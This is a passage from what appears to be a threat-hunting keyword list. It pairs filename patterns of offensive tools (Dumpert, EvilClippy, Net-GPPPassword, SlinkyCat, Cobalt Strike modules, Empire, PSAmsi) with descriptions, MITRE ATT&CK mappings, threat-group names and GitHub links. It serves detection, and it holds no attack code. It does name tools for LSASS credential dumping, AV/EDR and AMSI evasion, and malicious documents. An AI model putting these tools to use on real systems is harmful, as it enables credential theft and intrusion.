HTTPS options should be used to provide integrity and strong encryption.,T1021.002 - T1573.002 - T1001.003,TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/ThunderShell,1,0,N/A,10,10,759,254,2023-03-29T21:57:08Z,2017-09-12T01:11:29Z -*--out=nimcrypt*,offensive_tool_keyword,nimcrypt,Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project,T1027 - T1055 - T1099 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/icyguider/nimcrypt,1,0,N/A,N/A,1,83,5,2021-03-25T00:27:12Z,2021-03-24T17:51:52Z -*Out-CompressedDLL.ps1*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*Out-DnsTxt.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Outflank-Dumpert*,offensive_tool_keyword,Dumpert,Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.,T1003 - T1055 - T1083 - T1059 - T1204,TA0003 - TA0005 - TA0002,N/A,N/A,Credential Access,https://github.com/outflanknl/Dumpert,1,1,N/A,N/A,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*Outflank-Dumpert.*,offensive_tool_keyword,cobaltstrike,LSASS memory dumper using direct system calls and API unhooking.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor,1,1,N/A,10,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*outflanknl/Dumpert*,offensive_tool_keyword,Dumpert,Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.,T1003 - T1055 - T1083 - T1059 - T1204,TA0003 - TA0005 - TA0002,N/A,N/A,Credential Access,https://github.com/outflanknl/Dumpert,1,1,N/A,N/A,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*outflanknl/EvilClippy*,offensive_tool_keyword,EvilClippy,A cross-platform assistant for creating malicious MS Office documents,T1566.001 - T1059.001 - T1204.002,TA0004 - TA0002,N/A,N/A,Phishing,https://github.com/outflanknl/EvilClippy,1,1,N/A,10,10,1956,381,2022-05-19T23:00:22Z,2019-03-26T12:14:03Z -*outflanknl/Net-GPPPassword*,offensive_tool_keyword,Net-GPPPassword,.NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.,T1059.001 - T1552.007,TA0002 - TA0006,N/A,N/A,Credential Access,https://github.com/outflanknl/Net-GPPPassword,1,1,N/A,10,2,156,37,2019-12-18T10:14:32Z,2019-10-14T12:35:46Z -*outflanknl/Recon-AD*,offensive_tool_keyword,cobaltstrike,Recon-AD an AD recon tool based on ADSI and reflective DLL s,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Recon-AD,1,1,N/A,10,10,288,57,2019-10-20T21:49:39Z,2019-10-20T21:09:41Z -*outflanknl/SharpHide*,offensive_tool_keyword,SharpHide,Tool to create hidden registry keys,T1112 - T1562 - T1562.001,TA0005 - TA0003,N/A,N/A,Persistence,https://github.com/outflanknl/SharpHide,1,1,N/A,9,5,445,95,2019-10-23T10:44:22Z,2019-10-20T14:25:47Z -*outflanknl/Spray-AD*,offensive_tool_keyword,cobaltstrike,A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Spray-AD,1,1,N/A,10,10,408,58,2022-04-01T07:03:39Z,2020-01-09T10:10:48Z -*outflanknl/WdToggle*,offensive_tool_keyword,cobaltstrike,s,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/WdToggle,1,1,N/A,10,10,217,32,2023-05-03T19:51:43Z,2020-12-23T13:42:25Z -*Outflank-Recon-AD*,offensive_tool_keyword,cobaltstrike,Recon-AD an AD recon tool based on ADSI and reflective DLL s,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Recon-AD,1,1,N/A,10,10,288,57,2019-10-20T21:49:39Z,2019-10-20T21:09:41Z 
-*OutlookEmailAbuse.ps1*,offensive_tool_keyword,TokenTactics,Azure JWT Token Manipulation Toolset,T1134.002 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/rvrsh3ll/TokenTactics,1,1,N/A,N/A,5,439,67,2023-09-26T18:45:16Z,2021-07-08T02:28:12Z -*Out-Minidump.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1065,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Out-ObfuscatedAst.ps1*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - 
T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,1,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -*Out-ObfuscatedStringCommand.ps1*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,1,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -*Out-ObfuscatedTokenCommand.ps1*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,1,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -*output*kitten.exe*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,0,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*Output.aes.zip*,offensive_tool_keyword,EncryptedZIP,Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. 
This assembly also clears the key out of memory using RtlZeroMemory,T1564.001 - T1027 - T1214.001,TA0005 - TA0010,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*output/AccountsWithSPN.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/AdminAccessComputers.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/AllDomainControllers.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/AllDomainGroups.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/AllDomainHosts.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/AllDomainUserAccounts.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD 
Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/AllDomainUsers.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/AllServers.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/AllServers2k12.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/AllServers2k16.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/AllServers2k19.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/AllServers2k22.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/AllServers2k8.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD 
Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/AllTrusts.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/CompletedDescriptionField.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/DescriptionContainsPass.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/DNETAccountsByDescription.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/DomainAdmins.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/DomainGroupsLocalAdmin.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/DomainUserAccountsWithCompletedADDescription.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration 
tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/ExchangeServers.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/html/data/beacons.json*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*output/NeverLoggedInAccounts.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD 
Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/NonDCWindows10Computers.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/NonDCWindows11Computers.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/NonDCWindows7Computers.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/PasswordNeverExpire.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/payloads/*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*output/RatChatPT_unix*,offensive_tool_keyword,ratchatpt,C2 using openAI API,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,1,risk of False positive,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*output/RDPMachines.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/UsersInDomainAdminsGroup.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD 
Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/UsersLastPasswordChange.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/UsersNoPasswordRequired.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/UsersPasswordMustChange.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/UsersPasswordNotChanged.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/WinRMMachines.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*Out-RundllCommand*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
